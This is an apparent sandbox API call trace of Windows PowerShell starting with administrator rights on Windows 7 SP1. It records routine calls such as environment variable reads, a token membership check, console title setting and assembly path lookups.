	[0262.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.652] CoTaskMemFree (pv=0x24c3e0) 
	[0262.655] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0262.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.655] CoTaskMemFree (pv=0x24c3e0) 
	[0262.657] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0262.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.657] CoTaskMemFree (pv=0x24c3e0) 
	[0262.663] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0262.664] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12da10 | out: lpConsoleScreenBufferInfo=0x12da10) returned 1
	[0262.670] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0262.670] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12da10 | out: lpConsoleScreenBufferInfo=0x12da10) returned 1
	[0262.671] GetVersionExW (in: lpVersionInformation=0x12d9a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d9a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0262.674] GetCurrentProcess () returned 0xffffffffffffffff
	[0262.675] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12da38 | out: TokenHandle=0x12da38*=0x31c) returned 1
	[0262.678] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d958 | out: TokenInformation=0x0, ReturnLength=0x12d958) returned 0
	[0262.679] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c7260
	[0262.679] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x1c7260, TokenInformationLength=0x4, ReturnLength=0x12d958 | out: TokenInformation=0x1c7260, ReturnLength=0x12d958) returned 1
	[0262.681] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12dab8 | out: phNewToken=0x12dab8*=0x318) returned 1
	[0262.681] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d958 | out: TokenInformation=0x0, ReturnLength=0x12d958) returned 0
	[0262.681] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c7290
	[0262.681] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x1c7290, TokenInformationLength=0x4, ReturnLength=0x12d958 | out: TokenInformation=0x1c7290, ReturnLength=0x12d958) returned 1
	[0262.682] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x2d5c518*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12dac8 | out: IsMember=0x12dac8) returned 1
	[0262.683] CloseHandle (hObject=0x318) returned 1
	[0262.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0262.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0263.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0263.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0263.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0263.442] CoTaskMemAlloc (cb=0x804) returned 0x1b8a2080
	[0263.442] GetConsoleTitleW (in: lpConsoleTitle=0x1b8a2080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0264.407] CoTaskMemFree (pv=0x1b8a2080) 
	[0264.432] CoTaskMemAlloc (cb=0x804) returned 0x1b8a2930
	[0264.432] GetConsoleTitleW (in: lpConsoleTitle=0x1b8a2930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0264.432] CoTaskMemFree (pv=0x1b8a2930) 
	[0264.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.435] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0264.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0264.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0265.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0266.703] SetConsoleCtrlHandler (HandlerRoutine=0x22868dc, Add=1) returned 1
	[0266.722] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0266.723] CoCreateGuid (in: pguid=0x12dbb0 | out: pguid=0x12dbb0*(Data1=0xf98d6a66, Data2=0x7404, Data3=0x4bff, Data4=([0]=0xaa, [1]=0x7b, [2]=0x2c, [3]=0x5f, [4]=0xeb, [5]=0x2b, [6]=0x5d, [7]=0xe))) returned 0x0
	[0266.725] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0266.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0266.725] CoTaskMemFree (pv=0x24c3e0) 
	[0266.748] WinSqmIsOptedIn () returned 0x0
	[0267.430] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.430] CoTaskMemFree (pv=0x24c3e0) 
	[0267.431] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.431] CoTaskMemFree (pv=0x24c3e0) 
	[0267.431] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.431] CoTaskMemFree (pv=0x24c3e0) 
	[0267.432] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.432] CoTaskMemFree (pv=0x24c3e0) 
	[0267.432] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.432] CoTaskMemFree (pv=0x24c3e0) 
	[0267.434] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.434] CoTaskMemFree (pv=0x24c3e0) 
	[0267.435] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.435] CoTaskMemFree (pv=0x24c3e0) 
	[0267.435] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.435] CoTaskMemFree (pv=0x24c3e0) 
	[0267.438] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.438] CoTaskMemFree (pv=0x24c3e0) 
	[0267.441] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.442] CoTaskMemFree (pv=0x24c3e0) 
	[0267.442] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.442] CoTaskMemFree (pv=0x24c3e0) 
	[0267.442] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0267.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.442] CoTaskMemFree (pv=0x24c3e0) 
	[0268.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0268.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0268.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0268.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0270.165] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0270.165] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0270.165] CoTaskMemFree (pv=0x24c3e0) 
	[0270.167] CoTaskMemAlloc (cb=0xcc) returned 0x1b89da50
	[0270.167] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b89da50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0270.167] CoTaskMemFree (pv=0x1b89da50) 
